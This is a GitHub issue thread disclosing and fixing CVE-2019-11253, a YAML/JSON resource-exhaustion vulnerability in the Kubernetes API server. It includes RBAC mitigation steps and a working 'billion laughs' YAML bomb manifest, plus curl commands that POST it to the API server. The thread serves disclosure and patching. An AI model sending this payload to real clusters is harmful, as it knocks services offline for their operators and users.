
CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack #83253

Closed
raesene opened this issue Sep 27, 2019 · 16 comments · Fixed by #83261


@raesene raesene commented Sep 27, 2019

CVE-2019-11253 is a denial-of-service vulnerability in the kube-apiserver: authorized users sending malicious YAML or JSON payloads can cause the kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy.

Affected versions:

  • Kubernetes v1.0.0-1.12.x
  • Kubernetes v1.13.0-1.13.11, resolved in v1.13.12 by #83436
  • Kubernetes v1.14.0-1.14.7, resolved in v1.14.8 by #83435
  • Kubernetes v1.15.0-1.15.4, resolved in v1.15.5 by #83434
  • Kubernetes v1.16.0-1.16.1, resolved in v1.16.2 by #83433

All four patch releases are now available.

Fixed in master by #83261

Mitigation:

Requests that are rejected by authorization do not trigger the vulnerability, so tightening authorization rules and/or restricting access to the Kubernetes API server limits which users are able to trigger this vulnerability.

To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the attached file as rbac.yaml, and run:

kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions 

Note: this removes the ability for unauthenticated users to use kubectl auth can-i
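The attached file is not reproduced in this text. As a sketch of its likely shape (an approximation based on the v1.14+ bootstrap defaults, not the attachment itself), the policy binds the system:basic-user and system:discovery roles to authenticated users only:

# sketch only: approximates the v1.14+ default policy; binding these roles
# to system:authenticated removes unauthenticated access to the vulnerable endpoints
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:basic-user
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:basic-user
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:authenticated
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:discovery
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:discovery
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:authenticated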

If you are running a version prior to v1.14.0:

  • in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false
  • after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true
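After the first command, the binding's metadata carries the annotation, roughly as follows (a sketch trimmed to the relevant fields):

metadata:
  name: system:basic-user
  annotations:
    # "false" stops the API server from reconciling this binding back
    # to its bootstrap default on restart
    rbac.authorization.kubernetes.io/autoupdate: "false"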

=============

Original description follows:

Introduction

Posting this as an issue following a report to the security list, where it was suggested I put it here as it's already public in a Stack Overflow question.

What happened:

When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of the "Billion Laughs" attack, which is well known as an XML parsing issue.

Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.

apiVersion: v1
data:
  a: &a ["web","web","web","web","web","web","web","web","web"]
  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
  name: yaml-bomb
  namespace: default
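For a sense of scale: each level multiplies the previous one by nine, so entry i expands to 9^9 ≈ 387 million scalar values from under a kilobyte of input. A two-level version of the same pattern (hypothetical, not part of the report) shows the mechanics:

# each alias is expanded to a full copy of the anchored value during decoding
a: &a ["web", "web", "web"]   # 3 scalars
b: [*a, *a, *a]               # decodes to 3 copies of a: 9 scalars
# equivalent expanded form the parser must allocate:
# b: [["web","web","web"], ["web","web","web"], ["web","web","web"]]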

What you expected to happen:

Ideally, a maximum entity size would be enforced, or some limit placed on recursive references in YAML parsed by kubectl.

One note: the original poster on Stack Overflow indicated that the resource consumption was in kube-apiserver, but both tests I ran (1.16 client against a 1.15 kubeadm cluster, and 1.16 client against a 1.16 kubeadm cluster) showed the CPU usage client-side.

How to reproduce it (as minimally and precisely as possible):

Save the manifest above and apply it to a cluster as normal with kubectl create -f <manifest>. Use top or another CPU monitor to observe the quantity of CPU time used.

Anything else we need to know?:

Environment:

  • Kubernetes version (use kubectl version):

Test 1 (Linux amd64 client, kubeadm cluster running in kind)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"}

Test 2 (Linux amd64 client, kubeadm cluster running in VMware Workstation)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}

@raesene raesene commented Sep 27, 2019

/sig cli


@raesene raesene commented Sep 27, 2019

To update based on ideas from @liggitt and @bgeesaman: it's also possible to use this issue to cause a denial of service against the kube-apiserver by using curl to POST the YAML directly to the API server, bypassing the client-side processing entirely.

Steps to reproduce:

  1. Save the YAML as a file called yaml_bomb.yml
  2. Against a valid Kubernetes cluster, run kubectl proxy
  3. From the directory with the YAML saved, run curl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H "Content-Type: application/yaml" --data-binary @yaml_bomb.yml
  4. If your user has rights to create ConfigMap objects in the default namespace, the request will be accepted
  5. Observe CPU/memory usage in the API server(s) of the target cluster
@raesene raesene changed the title Kubectl YAML parsing vulnerable to "Billion Laughs" Attack. Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack. Sep 27, 2019
@liggitt liggitt self-assigned this Sep 27, 2019

@jbeda jbeda commented Sep 27, 2019

Just saw this -- we should stop accepting yaml server side. Or have a "simple yaml" variant that gets rid of references.

Any real world usages of users sending yaml to the api server? Can we go JSON/proto only?


@mauilion mauilion commented Sep 27, 2019

Nice find!


@liggitt liggitt commented Sep 27, 2019

Any real world usages of users sending yaml to the api server? Can we go JSON/proto only?

I don't think we can simply drop a supported format. Disabling alias/anchor expansion or bounding allocations seem more reasonable. I have a fix in progress that does the latter.


@pjbgf pjbgf commented Sep 28, 2019

Sounds like something that should be treated as a security issue (DoS) and have a CVE associated with it. That would help users understand whether or not they are vulnerable to it.

@liggitt liggitt changed the title Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack. CVE-2019-11253: Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack. Sep 29, 2019
@liggitt liggitt added this to the v1.17 milestone Sep 29, 2019

@simonferquel simonferquel commented Sep 30, 2019

I did a PR on go-yaml a year ago to mitigate this issue on some of our server-side components: go-yaml/yaml#375. Hope it helps!


@roycaihw roycaihw commented Sep 30, 2019

/assign @jktomer


@k8s-ci-robot k8s-ci-robot commented Sep 30, 2019

@roycaihw: GitHub didn't allow me to assign the following users: jktomer.

Note that only kubernetes members, repo collaborators and people who have commented on this issue/PR can be assigned. Additionally, issues/PRs can only have 10 assignees at the same time.
For more information please see the contributor guide

In response to this:

/assign @jktomer

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.


@anguslees anguslees commented Sep 30, 2019

I don't think we can simply drop a supported format.

I'm not disagreeing, but: We could drop yaml, and communicate that through Accept headers in an unambiguous way. On the other hand, claiming to accept "yaml" but then dropping support for some features of yaml seems harder for a client to respond to automatically :/

Also note we have patch variants like application/apply-patch+yaml that are probably vulnerable to this DoS too.

(I completely agree that almost no "legitimate" client is sending yaml with anchors, except maybe in a hypothetical CRD that is human authored and contains lots of internal duplication (argo pipeline??). I personally have no problems with nuking yaml anchor support, just as we also don't support !!foo, etc)
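(To illustrate the kind of legitimate, hand-authored aliasing being weighed here, a hypothetical fragment with invented names:)

# hypothetical hand-written fragment: one anchor reused to avoid duplication;
# this is what dropping anchor/alias support would break
defaults: &resources
  requests: {cpu: 100m, memory: 128Mi}
  limits: {cpu: 200m, memory: 256Mi}
containers:
- name: web
  resources: *resources
- name: sidecar
  resources: *resources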


@liggitt liggitt commented Sep 30, 2019

Also note we have patch variants like application/apply-patch+yaml that are probably vulnerable to this DoS too.

yeah, it would be a fundamental patch to the yaml library, effective process-wide


@raesene raesene commented Oct 1, 2019

It could be worth noting that, following discussions with the maintainer and the golang security team, a patch has been made for go-yaml which looks to address this kind of attack: go-yaml/yaml@bb4e33b

chris-crone added a commit to chris-crone/compose-on-kubernetes that referenced this issue Oct 1, 2019
To mitigate against malicious YAML (as described here:
kubernetes/kubernetes#83253) we used a patched
version of yaml.v2. There is now a fix upstream so we can leverage that.

Signed-off-by: Christopher Crone <christopher.crone@docker.com>
navidshaikh added a commit to navidshaikh/client that referenced this issue Oct 15, 2019
As per title, just to make sure we're not vulnerable to CVE-2019-11253.
See kubernetes/kubernetes#83253.
markusthoemmes added a commit to openshift/knative-serving that referenced this issue Oct 15, 2019
See CVE-2019-11253 and kubernetes/kubernetes#83253.
knative-prow-robot added a commit to knative/client that referenced this issue Oct 15, 2019
As per title, just to make sure we're not vulnerable to CVE-2019-11253.
See kubernetes/kubernetes#83253.
navidshaikh added a commit to navidshaikh/viper that referenced this issue Oct 16, 2019
Make sure we're not vulnerable to CVE-2019-11253.
See kubernetes/kubernetes#83253
sagikazarmark added a commit to spf13/viper that referenced this issue Oct 16, 2019
Make sure we're not vulnerable to CVE-2019-11253.
See kubernetes/kubernetes#83253
@liggitt liggitt changed the title CVE-2019-11253: Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack. CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack Oct 16, 2019
andrew-ni added a commit to vmware/container-service-extension-templates that referenced this issue Oct 23, 2019
- Added new photon template with Kubernetes 1.14.6 (latest) and weave 2.5.2
- Added new revision of ubuntu templates to fix CVE kubernetes/kubernetes#83253

- Ubuntu scripts: Added another network reload (More info: vmware/container-service-extension#432)

- Ubuntu scripts: Disabled ipv6 in ubuntu scripts, preventing connection errors related to ipv6

- Ubuntu scripts: Added these config options to `apt-get update` command:
    -o Acquire::Retries=3
    -o Acquire::http::No-Cache=True
    -o Acquire::http::Timeout=20
    -o Acquire::https::No-Cache=True
    -o Acquire::https::Timeout=20
    -o Acquire::ftp::Timeout=20

All the connection-based errors we’ve seen occur during apt-get update. These options give us more flexibility by retrying 3 times, and waiting 20 seconds for the connection before timing out.